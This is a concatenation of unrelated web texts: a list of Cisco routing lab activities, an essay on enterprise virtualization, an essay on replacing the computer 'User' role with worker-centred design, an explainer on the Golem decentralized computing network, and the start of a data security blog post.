The following activities provide practice with the topics introduced in this chapter. The Labs and Class Activities are available in the companion Routing Protocols Lab Manual (978-1-58713-322-0). The Packet Tracer Activities PKA files are found in the online course.
Class Activity: Do We Really Need a Map?
Class Activity: We Really Could Use a Map!
Lab: Mapping the Internet
Lab: Configuring Basic Router Settings with IOS CLI
Lab: Configuring Basic Router Settings with CCP
Packet Tracer Activities
Packet Tracer Activity: Using Traceroute to Discover the Network
Packet Tracer Activity: Documenting the Network
Packet Tracer Activity: Configuring IPv4 and IPv6 Interfaces
Packet Tracer Activity: Configuring and Verifying a Small Network
Packet Tracer Activity: Investigating Directly Connected Routes
During the past few decades, CIOs have stood at the center of one of the great technological revolutions in history: the replacement of the physical atom by the computational bit as the medium of commerce and culture. The profession might be forgiven for thinking that nothing is left for the next generation but tinkering. What could compare with a transition like that?
Actually, something almost as big might be coming over the horizon: the replacement of the bit with the virtual bit. Virtualization is the substitution of physical computing elements, either hardware or software, with artificial impostors that exactly replicate the originals, but without the sometimes inconvenient need for those originals to actually exist. Need a 1 terabyte hard drive, but only have 10 100GB drives? No problem, virtualization software can provide an interface that makes all 10 drives look and act like a single unit to any inquiring application. Got some data you need from an application you last accessed in 1993 on an aging MicroVAX 2000 that hit the garbage bin a decade ago? A virtual Digital VMS simulator could save your skin.
Stated like that, virtualization can sound like little more than a quick and dirty hack, and indeed, for most of the history of computing, that is exactly how the technique was viewed. Its roots lie in the early days of computing, when it was a means of tricking single-user, single-application mainframe hardware into supporting multiple users on multiple applications. But as every aspect of computing has grown more complex, the flexibility and intelligence that virtualization adds to the management of computing resources have become steadily more attractive. Today it stands on the lip of being the next big thing.
Raising the Dead
The Computer History Simulation Project, coordinated by Bob Supnik at SiCortex (see “Immortality for Aging Systems”), uses virtualization to fool programs of historical interest into thinking that they are running on computer hardware that vanished decades ago. Supnik’s project has a practical end as well: Sometimes old systems are so embedded in the corporate landscape that they must be kept running. If the real hardware is unavailable, the only way to keep the old machines running is to virtualize them.
In a more contemporary example of the power of virtualization, about three years ago J. R. Simplot, a $3 billion food and agribusiness company in Boise, Idaho, found itself in a phase of especially rapid growth in server deployments. Of course, with rapid growth comes the headache of figuring out how to do everything faster. In this case, the company’s IT center concluded that their old server procurement system had to be accelerated.
Servers, of course, are pieces of physical equipment; they come with their own processing, memory, storage resources and operating systems. What the Simplot team did was use virtualization tools from VMware, a virtual infrastructure company, to create software-only servers that interacted with the network just like hardware servers, although they were really only applications. Whenever Simplot needed another server it would just flip the switches appropriate to the server type (Web, application, database, e-mail, FTP, e-commerce and so on). From that point, an automated template generated the virtual machine on a specific VMware ESX host machine.
According to Tony Adams, a technology analyst at Simplot, there were gains all across the board. The time to get a new server up and running on the system went from weeks to hours or less. Uptime also increased, because the servers were programs and could run on any supported x86 hardware anywhere. If a machine failed or needed maintenance, the virtual server could be quickly moved to different hardware.
Perhaps most important were the gains in utilization efficiencies. Servers are built for specific roles. Sometimes demand for a particular role is in sync with available resources, but usually it isn’t. In the case of “real” servers, if there is a mismatch, then there is nothing that you can do about it; you’re stuck with what you have. If you end up with an average utilization rate of 10 percent per server, so be it. (The need to provide for peak demand makes the problem worse, and utilization can often be far below even 10 percent.) Low utilization means IT is stuck with unnecessary maintenance issues, security faces unnecessary access issues (they have to worry about protecting more machines), and facilities must deal with unnecessary heat and power issues.
Virtualization fixes these problems. The power to design any kind and number of servers that you like allows you to align capacity with load continuously and precisely. In the case of Simplot, once Adams’s servers turned virtual, he was able to deploy nearly 200 virtual servers on only a dozen physical machines. And, he says, typical CPU, network, disk and memory utilization on the VMware ESX boxes is greater than 50 percent—compared with utilization of around 5 percent on dedicated server hardware.
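The arithmetic behind those gains is worth making explicit. The following is an illustrative back-of-the-envelope calculation, not Simplot's actual tooling; it assumes each consolidation host has roughly the capacity of one of the old dedicated boxes, and the 85 percent packing target is an arbitrary headroom choice:

```python
import math

def hosts_needed(n_servers: int, per_server_load: float, target_util: float) -> int:
    """Physical hosts required to carry n_servers, where each server
    contributes per_server_load (as a fraction of one host's capacity),
    while keeping every host at or below target_util."""
    total_load = n_servers * per_server_load
    return math.ceil(total_load / target_util)

# 200 servers that each kept a dedicated box only ~5% busy...
dedicated = 200                                # one box per server
consolidated = hosts_needed(200, 0.05, 0.85)   # pack hosts to 85% for headroom
print(dedicated, consolidated)                 # 200 12
```

With the article's numbers, an aggregate load of 10 host-equivalents packed at 85 percent lands on 12 hosts, matching the dozen physical machines Adams reports.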
Virtualization also makes disaster recovery planning simpler, because it allows you to write server clusters appropriate to whatever infrastructure you have on hand. As Adams points out, conventional disaster recovery schemes force you to have an exact clone of your hardware sitting around doing nothing. “But personally, what I really like,” he says, “is the remote manageability. I can knock out new [servers] or do repairs anywhere on the Net, without even going to the data center.”
Adams wants one machine to look like many machines, but it is just as possible to virtualize the other way: making many machines look like one. Virtualization underlies the well-known RAID storage tricks that allow many disks to be treated as one huge drive for ease of access, and one disk to be treated as many for the purpose of robust backup. Another prime use for virtualization is development. The hardware world is growing much more complex all the time: Product cycles are turning faster, the number of device types is always rising, and the practice of running programs over networks means that any given program might come in contact with a huge universe of hardware. Developers can’t begin to afford to buy all of this hardware for testing, and they don’t need to: Running products on virtualized models of the hardware allows for quality assurance without the capital expense. Virtualizing the underlying hardware also gives developers far more control. Peter Magnusson, CTO of Virtutech, a systems simulation company in San Jose, Calif., points out that you can stop simulated hardware anywhere you like, any time you want to investigate internal details.
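The many-as-one direction is, at bottom, an address translation that callers never see. Here is a minimal sketch of RAID 0-style striping, assuming fixed-size blocks and identical member disks (real RAID adds parity, caching, and failure handling):

```python
def stripe(logical_block: int, n_disks: int) -> tuple[int, int]:
    """Map a block of the virtual 'one big drive' to (disk index,
    physical block on that disk). Consecutive logical blocks rotate
    round-robin across the member disks, RAID 0 style."""
    return logical_block % n_disks, logical_block // n_disks

# Ten drives presented as one: block 7 lands on disk 7, block 10 wraps
# back around to disk 0.
print(stripe(7, 10))   # (7, 0)
print(stripe(10, 10))  # (0, 1)
```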
During the next year or two, virtualization is on track to move from its current success in storage, servers and development, to networks and data centers. So CIOs will then be able to build software versions of firewalls, switches, routers, load balancers, accelerators and caches, exactly as needed. Everything that was once embodied in cards, disks and physical equipment of any kind, will be organized around a single point of control. If virtualization vendor promises materialize, changes that once were out of the question, or that at least would have required considerable man-hours and operational risk, will be done in minutes, routinely.
What those changes will mean is very much a topic for current discussion. For instance, all the new knobs and buttons virtualization provides will raise issues of policy, because it will be possible to discriminate among classes of service that once had to be handled together. You will, for instance, be able to write a Web server that gives customers who spend above a certain limit much better service than those who spend only half as much. There will be huge opportunities for automation. Infrastructure may be able to reconfigure itself in response to changes in demand, spinning out new servers and routers as necessary, the way load balancing is done today. (Certainly IBM et al. have been promoting just such a vision of the on-demand computing future.)
Virtualization examples so far have all been hardware-centric, because the inherent inflexibility of hardware means the elasticity advantages of virtualization are greater than with software. However, virtualization can work anywhere in the computing stack. You can virtualize both the hardware and the operating system, which allows programs written for one OS to run on another, and programs written for a virtual OS to run anywhere (similar to how Java maintains its hardware independence through the Java Virtual Machine).
Quite possibly the growth of virtualization predicts a deep change in the responsibilities of CIOs. Perhaps in the not-too-distant future no CIO will ever think about hardware: Raw physical processing and storage will be bought in bulk from information utilities or server farms. Applications will be the business of the departments or offices requiring them. The center of a CIO’s job will be the care and feeding of the execution environment. The very title of CIO might vanish, to be replaced, of course, by CVO.
Taking It All In
In that world, virtualization could graduate into a full-throated simulation of entire systems, the elements of which would not be just computing hardware, as now, but all the motors, switches, valves, doors, engines, vehicles and sensors in a company. The model would run in parallel with the physical company and in real-time. Where now virtualization is used for change management, disaster recovery planning, or maintenance scheduling for networks and their elements, it would in the future do the same for all facilities. Every object or product sold would come with a model of itself that could fit into one of these execution environments. It would be the CVO’s responsibility to make sure that each company’s image of itself was accurate and complete and captured the essentials. And that would not be a virtual responsibility in the least.
Fred Hapgood is a freelance writer living near Boston.
…when everything becomes a computer, there will be no more computers
Starting Premise. 1 Let us agree, for the sake of a thought experiment, that a Human represents the ultimate Machine potential. In other words, every Machine that a Human creates is a subset of Human capabilities. Yes, a Machine may be stronger, faster, lighter, more durable, et cetera than a Human; however, the greatest capabilities with which a Human will be able to endow a Machine are those of the Human. For the reader who wants to debate Human flight, consider that the Human is capable of flight, albeit only over extremely short, survivable distances.
The Design Optimization complement to Human aspiration is a profoundly symbiotic form of Artificial Intelligence.
Back to the Future Past. In 1867, American inventor Christopher Latham Sholes struggled with improving the performance of the typewriter. If commonly used letter pairings such as S-T were struck too quickly, the mechanical linkages that transmitted the letter key selection to the striking of that letter on paper would jam. The typist had to stop Work, turn attention away from the source material to the typewriter, untangle the jammed keys, reset their fingers on the keys, check that the typewriter carriage was in the proper spot, turn their attention back to the source material, and resume Work.
The speed of the typewriter (a Machine) was inhibited by the faster speed of the Worker. Sholes’ solution to this problem was to separate the commonly used letter pairings and place the most frequently used keys on the left side of the layout. This solution slowed the Worker so that the Machine could perform at its best. Unfortunately, Human obsession with technology enables Machines to transform and evolve much faster than the Human being itself evolves. Thus, the speed of the Machine today is inhibited by the slower speed of the Worker.
“Those who cannot remember the past are condemned to repeat it.” Reason in Common Sense – George Santayana, 1905. In 2021, while computing Machines operate at speeds greater than that of Human thought, we must revisit System Solution design to avoid unintended consequences arising from lack of foresight.
CognitiveVirtual by SwissCognitive
Global Online AI Event Series
07. April 2021
Event Recording – Panel Discussion – With Input from Stewart Skoma
“User” Anomaly. Other than with respect to most electronic Machines (e.g., computers, tablets, smartphones, et cetera), the User role does not occur in Humanity (except in references to consumers of recreational drugs). Drivers drive cars. Passengers ride in cars, in buses, on boats, on planes. People wear clothes, sleep on mattresses, swing golf clubs, hit golf balls, swim in pools, ride bicycles, enjoy entertainment, et cetera. Children play games, play sports, learn math, learn spelling, compose essays, read books, et cetera.
It is natural to discuss a homemaker using a stove, pots, and pans to make a meal and downright awkward to think of a User using a stove, pots, and pans… “User”, while necessary at the outset of the computer industry, should have become passé not long after Donald A. Norman’s 1999 publication of The Invisible Computer.
Please take note: When your child or grandchild asks for the iPad, they say: “May I play with/watch the iPad?” They do not say “May I Use it,” and (most important) they will grow to never Use computers in the future. Just as, if everything were the color blue, there would be no color blue, when everything becomes a computer, there will be no more computers. As goes the computer, so goes User.
…when everything becomes a computer, there will be no computers.
In the context of Machines as subsets of the Human, it is fair to accept that most everything a Human may want to accomplish with a computing Machine was described by Dr. Vannevar Bush in his July 1945 Atlantic Monthly article As We May Think. One can make the case that Humanity has only now, in the year 2021, delivered on the vision of Dr. Bush. Further progress may be hampered by Humanity getting in its own way.
As We May Do. ‘Humanity getting in its own way’ is mistakenly accepting the User role as fundamental – believing that the ‘User’ is doing something more [as in the performance of Work = (Force x Distance) + (Thought x Time)] than retrieving data from one Machine process and feeding it into another Machine process.
Computers are Machines. A Machine is an invention created by Humans to make work easier by multiplying the effect of Human effort. When creating a system solution design comprising Machines that execute management science algorithms (e.g., Double-Entry Bookkeeping, Linear Programming, Off-Set Leadtime Planning, et cetera), placing the non-Value-Add User role at its center ensures the automation will never run faster than the slowest User role being fulfilled by a Human.
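Off-Set Leadtime Planning, one of the algorithms named above, shows how mechanical this Management Science is; a Machine executes it trivially. A minimal sketch, with hypothetical part names and lead times chosen purely for illustration:

```python
from datetime import date, timedelta

def release_date(due: date, lead_time_days: int) -> date:
    """Off-set lead-time planning in one line: to have material ready
    on its due date, release the order lead_time_days earlier."""
    return due - timedelta(days=lead_time_days)

def plan(lead_times: dict[str, int], finish: date) -> dict[str, date]:
    """Back-schedule an order release for every component from the
    finished-goods due date."""
    return {part: release_date(finish, days) for part, days in lead_times.items()}

orders = plan({"frame": 14, "motor": 30, "fastener kit": 3}, date(2021, 6, 1))
print(orders["motor"])  # 2021-05-02
```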
Unfortunately, as Humanity continues relentlessly advancing technology, what many Users today actually do is stare at refracted light (sometimes it is reflected, as in the case of reflective display technology) or listen to synthesized speech and populate data (through myriad input mechanisms) that cause a Machine process to take the next programmed step in emitting refracted light and/or synthesizing speech.2
What is fundamental is that which a Worker does, as in Work = (Force x Distance) + (Thought x Time). It is what a Worker does and not how they spend time that is fundamental and needs to be elevated in the revisiting.
System Solutions must be revisited knowing that the same Management Science and Physical Science has been automated upstream, downstream, and throughout extended enterprise system solutions. It comes as no surprise that the “Outputs” of one enterprise look a lot like the expected “Inputs” of another enterprise. What becomes a surprise is when there is a tremendous mismatch between enterprise-to-enterprise systems, especially in the post-Y2K era. Chances are good that an IT vendor and/or IT Employee convinced one or more Workers in one or both enterprises that they are so special that unique software must be written for them.
Back to the Future. Enabling Machines to automatically create Machine automation (i.e., computers programming computers) may require a breakthrough approach such as the movement from 3rd Person Design for 1st-Person Execution to the 2nd-Person Design + Execution. This new design perspective may then enable the conceptualization of the “Mind” of the first Machine interacting within itself and its environment conceptualizing and realizing a “Mind” of a second Machine, and so on.
Time out & Back up. Before attempting to wrap your head around the above paragraph, let us agree that, for Machine automation to achieve its potential, there would need to be a change; that something is broken and needs to be fixed. The old saw says, ‘The first step in a cure is accepting that you are sick’. So, what is wrong with what we are doing with computers today that precludes advancement, why is it that way, and what do we need to do differently?
Admitting Sickness. Anecdotally, while information technology has advanced exponentially, the increase in marginal productivity from the investment in information technology has been in decline. In other words, the same or more investment of Time + Talent + Treasure into exponentially advancing information technology is met with smaller and smaller improvements in outcome.
In 2021, every Design Engineer has multiple Computers (e.g., design workstation, notebook computer, tablet, smartphone, et cetera) at their disposal, each of which is over 1,000,000 times the power of the single computer they had in 2001. New product development success has not advanced at the rate of the empowering underlying Machine automation.
With an overabundance of computers, most product development continues progressing incrementally, with the success of new product development initiatives being not much greater than the success of a Startup. It is no surprise that bright, energetic, talented engineers abandon what truly are exciting projects in large enterprises, throw caution to the wind, and become entrepreneurs.
Let us assume this flagging growth in productivity in the face of exponentially growing technology resource is true and that it is a problem. What is the Root Cause of this paradox? Simply stated, the Root Cause of today’s declining marginal returns in productivity and operational efficiency from investment in Information System Solutions is failure of Computer Science to implement Information Science for Optimization of how we Live – Work – Play. This failure will be overcome by establishing and working from a new perspective.
The rise of User. Fifty years is not a very long time in the history of Humanity. In the early 1970s, long before any talk of computer User Experience or Human-Machine Interface (HMI), most all HMI was punched-card and paper-tape data input resulting in delivery of fan-folded green bar printed paper information output.
Green bar report production, sorting, delivery, storage, and archiving became an around-the-clock operation within each company that implemented computer automation earning itself a newly established functional department named Data Processing or DP for short.
DP initially served business functions directly responsible for: keeping track of money (Accounting), spending money on Workers (Payroll), and spending money on things (Materials).
Accounting, Payroll, and Materials Workers became the primary consumers of the output. While these Workers certainly used the DP department output, their primary role remained Accounting, Payroll, and Materials. None of these Workers was yet a computer user – or User, for brevity.
Humans continued advancing computing Machines enabling the concept of online transaction processing (OLTP) or being “online” with the computer. Through typewriter-style keyboards, stylus, light pen, microphone, camera, mouse, joystick, et cetera humans fed data input to the Machines. Through video display terminals, speakers, printers, and plotters humans consumed the information output from the Machines. Data Processing or DP evolved to become Management Information Systems or MIS.
The field of Management Science (initially pioneered in The Principles of Scientific Management – 1911, by Frederick Winslow Taylor) reached its zenith in the mid-1960s with the work of George Plossl and Oliver Wight, memorialized in their seminal 1967 work: Production and Inventory Control – Principles and Techniques. Combined with Marks’ Standard Handbook for Mechanical Engineers – 1916-2016, we have algorithms for the molding of natural resources (“Physical Science”) to produce tools and Machines, and the principles and techniques to plan, schedule, produce, and deliver (“Management Science”) volumes of these tools and Machines. Imbuing Machines with these algorithms, principles, and techniques is the province of Information Science.
Information Science took significant steps forward when talented IBM Information Science professionals in 1973 published IBM COPICS – Communications Oriented Production Information and Control System – serving as a Storyboard, External Design, and Information Model to realize automation of Plossl & Wight Management Science.
Proliferating User. IBM lore holds that founders of SAP SE were authors of essential COPICS system modules. These IBM Germany professionals saw the creation of Financial Accounting and Back-Office automation programs 3 as an opportunity that they could not pass up. Unfortunately, COPICS and most every other attempt to apply Computer Science to Management Science to create Information System Solutions were a product of systems engineers steeped in 1970s foresight. COPICS and all other seminal work in OLTP did not imagine that computing technology would ever evolve to enable the actual product being produced through a manufacturing process to monitor and report on its own state and condition.
In working to realize IBM COPICS and myriad other OLTP system solution offerings, wherever the system designers encountered a capability that could not be performed by a Machine, they inserted a Human Worker in the User role. The User role itself is a non-Value-Add role (versus the Value-Add or Cost-Add roles of Value Chain definitions) created because humanity did not yet know what it did not know in the continuously advancing Computer Science & Information Science symbiotic relationship. Sadly, in most cases in the year 2021, the User role persists as a vestige of early Computer Science challenges in enabling one Machine (i.e., Computer) to communicate with another Machine.
Throughout the 1980s-1990s, Computer Science continued its advancement producing reentrant, multi-tasking enabled OLTP offerings for multi-threaded concurrent multiple input-output multi-programming models that would facilitate the realization of the COPICS and similar pioneering efforts of the period.
MIS proliferated throughout most all businesses with green bar reports and OLTP as its production. MIS employees would show up at the Accounting, Payroll, and Materials offices with a video display terminal (VDT) and keyboard, plop it on the Worker’s desk and say: “Use this and you will not have to wait as long for your reports!”.
A very subtle transformation began with the introduction of an additional role being filled by the Accounting, Payroll, and Materials Workers: User. MIS continued to advance with capabilities enabled for most every functional role within a company. Most every Worker began to take on this additional User role.
Humanity almost imperceptibly assumed this computer-related additional User responsibility, taking on the role of feeding the Machines and distributing the Machine output that had formerly been held by MIS. Most every Worker became a User. Since every Worker is not a manager, MIS renamed itself with the more universal designation of Information Technology or IT.
Systems Solution Perspective. Complete end-to-end IT system solutions were developed, IT careers were created, and books were written. Academia created undergraduate, graduate, and post-graduate curriculum feeding what became known as the IT Industry with workshops, seminars, and conferences. Throughout all this growth and evolution, attention transitioned from the Value-Add Worker role to the non-Value-Add User role to the point that the IT Industry primarily monetizes its offerings based on the number of Users versus value delivered.
Unfortunately, few readers of Donald A. Norman’s contributions to 1986’s User Centered System Design: New Perspectives on Human-Computer Interaction may have read Norman’s complete works on design (not least of which is 1999’s The Invisible Computer). It is likely that a very small minority read any more than the first chapter of any of Norman’s works, anecdotal estimates being that less than 10% of non-fiction readers continue reading past the first chapter.
Unintended Consequence of User-Centered Systems Design. With a Systems Solution perspective and armed with seminal works such as User Centered System Design: New Perspectives on Human-Computer Interaction, Donald A. Norman & Stephen W. Draper, 1986, emphasis was thrust upon “User Experience” with IT Employees altogether bypassing methodical, rational product planning and instead rushing out to the User (‘Worker’) and asking them what they need.
The Worker never considers themselves to be a User. Workers are hired to fulfill a Role and, in doing so, earn and are paid wages; in other words, to do a job. What the Worker needs is #1 to be left alone to do their job, #2 a sense of security in their job, and #3 opportunity for growth. Since the IT Employee has already violated #1, the Worker focuses attention on #2 while hoping for #3. The result of the IT Employee-to-Worker interaction is that the Worker/User answers the IT professional’s request by telling them that they need something new and different from what they have.
This begins a mutually beneficial co-dependent relationship between individual IT Employees and individual Workers that, unfortunately, serves as a detriment to the overall good of the company. To satisfy one another’s personal professional interests, they convince one another that what the User is doing is so special and so unique that it requires a special and unique IT solution.
IT vendors (the ones selling off-the-shelf System Solutions) thrive off this IT Employee-Worker dynamic, as it creates customization of their off-the-shelf offerings, making it very difficult to ever replace the solution. The IT Employee, the User (i.e., Worker), and the IT vendor create a dependence upon themselves, individually and collectively, going forward. Unfortunately, IT vendors, IT Employees, and Workers retire and expire, and the company suffers what could be operationally catastrophic disruption.
The IT vendor, IT Employee and Worker co-dependency holds the system solution potential hostage until one or more of these actors retires and/or expires.
2000s – Today
Fear is a Powerful Motivator. In anticipation of “unknown unknowns” wreaking havoc throughout Humanity at the turn of the last millennium, beginning in the late 1990s, most all company IT systems were replaced wholesale with alternatives free of the Y2K 4 problem. Myriad legacy systems held hostage by the IT Employee – Worker co-dependence were simply tossed out and replaced with new IT vendor offerings, which immediately sought to institute the IT vendor – IT Employee – Worker co-dependency. Unfortunately, many succeeded.
Variants of Sameness. OLTP System Solutions share the same lineage. Because of the Y2K wholesale replacement of legacy OLTP offerings with a few IT vendor offerings, the common lineage is now much more highly concentrated. All the OLTP System Solutions share the same Management Science and Physical Science heritage, and today most all share the same or similar IT software base. With respect to these systems, 15th-century double-entry bookkeeping is the backbone – there is a place for everything, and everything needs to be put in its place – wash, rinse, repeat. It should come as no surprise that Machines are able to learn and then repeat the processes by which companies operate.
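That 15th-century backbone is small enough to sketch whole. The invariant is that every transaction touches two accounts, so the ledger as a whole always nets to zero; the account names below are hypothetical:

```python
def post(ledger: dict[str, int], debit_acct: str, credit_acct: str, amount: int) -> None:
    """Double-entry posting: debit one account, credit another, so the
    ledger as a whole always sums to zero."""
    ledger[debit_acct] = ledger.get(debit_acct, 0) + amount
    ledger[credit_acct] = ledger.get(credit_acct, 0) - amount

ledger: dict[str, int] = {}
post(ledger, "inventory", "cash", 500)  # buy materials
post(ledger, "cash", "sales", 800)      # sell product
print(ledger)                           # {'inventory': 500, 'cash': 300, 'sales': -800}
print(sum(ledger.values()))             # 0 -- wash, rinse, repeat
```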
RPA: The New QWERTY. In the year 2021, Robotic Process Automation (RPA) is on the rise within the field of Artificial Intelligence (AI). A simple definition of RPA is having a computer learn basic, repetitive tasks performed by a User so that the computer (a Machine) can perform the same User task. After nearly 50 years of obsession over “User”, this non-Value-Add role will be subsumed within Machine automation. It does seem fitting that the Machine should assimilate the function of exchanging data between Machines. Are we, though, creating another QWERTY keyboard? Since the system solution was purportedly developed as “User Centric”, would it not be prudent to step back and revisit system solutions, making them Work and Worker Centric?
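Stripped of vendor tooling, the definition above (have a Machine learn a repetitive User task, then repeat it) reduces to a record-and-replay loop. A toy sketch with hypothetical action names, not any actual RPA product's API:

```python
from typing import Callable

recording: list[tuple[str, str]] = []

def record(action: str, target: str) -> None:
    """Capture one step of the User's demonstration."""
    recording.append((action, target))

def replay(perform: Callable[[str, str], None]) -> None:
    """Have the Machine repeat every recorded step."""
    for action, target in recording:
        perform(action, target)

# The User demonstrates the task once...
record("open", "invoices.csv")
record("copy", "total column")
record("paste", "ledger sheet")

# ...and the bot repeats it on demand; here each step is just printed.
replay(lambda action, target: print(action, target))
```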
Solution: Move to the 2nd Person. The cure – the way to break the Information Technology Industry out of its malaise – is simple. A “User”-centric approach of Information System Solution design has the design of a solution accomplished in the 3rd Person with the intent of a Worker employing the product in the 1st Person. Worker-Centric design, where the Machine performs as an enhancement to the Worker must be accomplished from a 2nd Person perspective (in the spirit of Free Indirect Speech style).
There are few noteworthy novelists of acclaim writing in the Free Indirect Speech style, the most noteworthy being James Joyce, with the easier work to consume being his 1916 A Portrait of the Artist as a Young Man.
“History, Stephen said, is a nightmare from which I am trying to awake.”
A Portrait of the Artist as a Young Man,
James Joyce, 1916
2nd Person perspective is that wherein the Designer/Developer is immersed directly within the context of the Information System Solution Execution. Unlike the traditional history-biased 3rd Person perspective from which a Worker employs a product in the 1st Person perspective, the 2nd Person focus is on the present and the future. 3rd Person perspective enjoys the benefit of hindsight – learning from experience. Unfortunately, too may IT Workers and IT vendors confuse prediction (what the future will be) with forecasting (what the future should be). It is this “rearview-mirror forecasting” that results in tremendous misses in prediction. Leaning so heavily on historical data for predicting future-history – as most everyone does – is equivalent to declaring: “My, what a wonderful future you have behind you!”
Design Optimization is Amid the 2nd Person Vanguard. Machines assisting Humans in design – formulating, executing, and learning from executed plan results – is the nature of AI – Artificial Intelligence realized through Engineering Design Optimization. Computational algorithms and methodologies applied to design enables engineers to feed their design to Machines executing powerful optimization engines. Engineering Design Optimization frees the engineer to focus on design needs and desired outcomes.
Design Engineering Optimization, Machines – computers and algorithms – enables Workers to create more economically and ecologically-responsible designs all while consuming less resources. This virtuous cycle can be extended from optimized design-to-optimized planning-to-optimized execution and demands we revisit Enterprise System Solutions and the non-Value-Add User role.
The Design Optimization complement to Human aspiration is a profoundly symbiotic form of Artificial Intelligence.
For purpose of this narrative, we will not consider the post-Singularity Machine-Enhanced Human of Raymond Kurzweil fame.
2 Yes, the reader may take exception to the above and possibly use fully immersion Virtual/Augmented/Mixed-Reality (VR/AR/MR) as examples – In 2021, these are predominately point solutions and not System Solutions or (as is the dominant forms) serving Gamers, not Users.
3 General Ledger, Accounts Payable, Payroll, (GLAPPR) & Billing, Inventory Control, Accounts Receivable, Sales Analysis (BICARSA)
4 For those unfamiliar, IT software developed prior to the Year 2000 (Y2K) in many cases represented the year as two digits (e.g., 1999 = ‘99’). Ambiguity arose when the year turned to 2000 as the Machine (i.e., Computer) did not know whether ‘00’ represented 1900, 2000, 1800, 1700, et cetera. This Y2K “glitch” required software to be rewritten to resolve the ambiguity and similar issues.
About the Author:
Stewart Skomra is CEO of OmniQuest™. For over 35 years Stewart has driven New Product and New Market Development Computer-Aided Design & Computer-Aided Manufacturing, Machine-to-Machine/IoT – Internet-of-Things, Supply-Chain Management, Auto-ID, and Wireless Technologies. From Blue-Chips including IBM, Intel, Qualcomm, and Trimble Navigation through multiple startups, he has led development initiatives serving industries including manufacturing, construction, distribution, transportation & logistics, wholesale & retail, consumer packaged goods, along with finance, insurance, healthcare, and multiple energy fields.
CognitiveVirtuals are regular worldwide-reaching online events bringing dozens of global AI leaders and experts together to share their views, experiences and expertise in the development of AI to the benefit of business and society. These 3 hour-long events are transparently addressing the development of cognitive technologies – including successes and challenges – while reaching and connecting a global online community of over ½ million followers.
All the sessions and formats are strictly content-driven with a non-sales approach, allowing focused and open discussions with content only. These events provide not only a platform to brainstorm and network but also to position experts, leaders, organisation, research developments, the current status and future outlook of AI.
Check out our upcoming CognitiveVirtual HERE | <urn:uuid:b7035ef8-d9c7-4978-9ad9-b8494da56955> | CC-MAIN-2022-40 | https://swisscognitive.ch/2021/04/23/ai-demands-workers-stop-being-used/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00487.warc.gz | en | 0.932493 | 4,995 | 2.9375 | 3 |
Blockchain technology already underpins some of the most impressive creations of the modern world, and cryptocurrencies have evolved into powerful tools for investors.
But here’s the deal:
This technology is not all about building wealth or making it easier for people to create, sign and enforce contracts without the need for a lawyer. Blockchain and the cryptocurrency Ethereum are being used to build the world’s first decentralized supercomputer, Golem Network.
In this blog, I’m going to show you how Golem is different from any other supercomputer out there and why it’s something you should keep on your radar.
Introducing the Golem Network (GNT)
Called variously the Golem Network, the Golem Project, and the Golem Supercomputer, but most often referred to simply as Golem, this development marks the first attempt at creating a worldwide, decentralized supercomputer.
This supercomputer can deliver benefits to virtually anyone, anywhere on the planet. Golem already exists, although the network remains in its infancy, but what does it actually do? Is it really a supercomputer?
Golem is a “supercomputer” only in a loose sense: it is a network of decentralized computers that rent out computing resources in exchange for money.
To answer the second question first, no, Golem is not a supercomputer, at least not in the traditional sense. Instead, it’s more closely related to a cryptocurrency mining network.
What does this mean?
Golem harnesses the power of its constituent machines to complete tasks and reach goals.
According to Golem’s official website, “Golem is an open source, decentralized supercomputer that anyone can access. It is made up of the combined power of users’ machines from PCs to entire data centers.”
What are those goals? What’s it supposed to do?
Once more, we turn to the official website. “Golem creates a decentralized sharing economy of computing power and supplies software developers with a flexible, reliable and cheap source of computer power.”
According to a blog post written by Eddy Azar, a former member of the Golem team, the supercomputer will have very wide-ranging impacts. It will affect things like the ability to complete scientific research and the speed of finishing that research.
It has already affected the field of graphics rendering and is now being investigated for its use in artificial intelligence and machine learning. Golem will impact the world of data analysis, as well as cryptocurrency mining.
Now that we know what Golem is and the principles it’s based on, let us look at how Golem works.
How Does Golem Work?
Golem works like any other token in most ways. It operates on the Ethereum network and is built to essentially settle payments between providers, software developers, and others.
Golem is a decentralized network built on Ethereum, which is used to settle payments between developers and providers.
It’s about sharing computing power and network resources without worrying about who’s on the network, or whether those resources have been paid for.
Golem takes the traditional world of computations and turns it on its head. In most instances, whether we’re talking about a home PC or a server in a data center, resource use and computation affect the entire system.
Heavy computation creates a massive draw on power and processing capabilities, slowing the system to a crawl in some cases.
With Golem, that doesn’t happen. According to the Golem Network’s official website, “all computations take place in sandbox environments and are fully isolated from the hosts’ systems.”
Let us now move to the next section, where we look at some of Golem’s test cases.
Golem Network Use Cases
At the time of this writing, Golem only has a single, official use case, which is CGI rendering. Rendering three-dimensional objects and then animating them requires a significant amount of computation power and resources.
As of this writing, CGI rendering is Golem’s main and only official use case.
With Golem, that is not the case, as the system can distribute the processing required across the entire network. This dramatically speeds up the entire process, while allowing requesters to set their own prices for rendering work.
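The distribution idea can be sketched with a toy model. This is not Golem's actual API, just an illustration of splitting one rendering job into tiles and handing them to a pool of workers, the way provider nodes on a network could each take a slice of the job:

```python
from concurrent.futures import ThreadPoolExecutor

def render_tile(tile):
    # Stand-in for an expensive rendering step on one tile of a frame.
    return sum(i * i for i in range(tile * 1000, (tile + 1) * 1000))

def render_frame(num_tiles=8, workers=4):
    # Split one frame into tiles and farm them out to a pool of workers.
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return list(pool.map(render_tile, range(num_tiles)))

print(len(render_frame()))  # 8 tiles, computed concurrently
```

Requesters on the real network additionally negotiate prices and verify results; this sketch only shows the split-and-distribute step.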
And that’s not all...
Machine learning is a second use case that is currently being pursued, but the team heading up Golem says, “we are already in the process of integrating a variety of new use cases to Golem in cooperation with our business and technological partners.”
In the end, Golem might not be a supercomputer in the classical sense, but it does deliver vastly improved computation power and has implications for virtually every industry on the planet. | <urn:uuid:9913b131-18a1-4ad3-ad1b-d2b861279ada> | CC-MAIN-2022-40 | https://www.datacenters.com/news/how-the-golem-network-turns-the-idea-of-the-supercomputer-on-its-head | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00487.warc.gz | en | 0.934432 | 1,005 | 2.828125 | 3 |
Secure Data Protection
June 06, 2022
Contributed by James Miller, Associate Penetration Tester, DOT Security.
What is data security? In modern business, it is about keeping critical information out of the wrong hands and safeguarding all of your company, employee, and customer data. Data breaches can have a devastating impact on businesses, especially those that handle sensitive information every day.
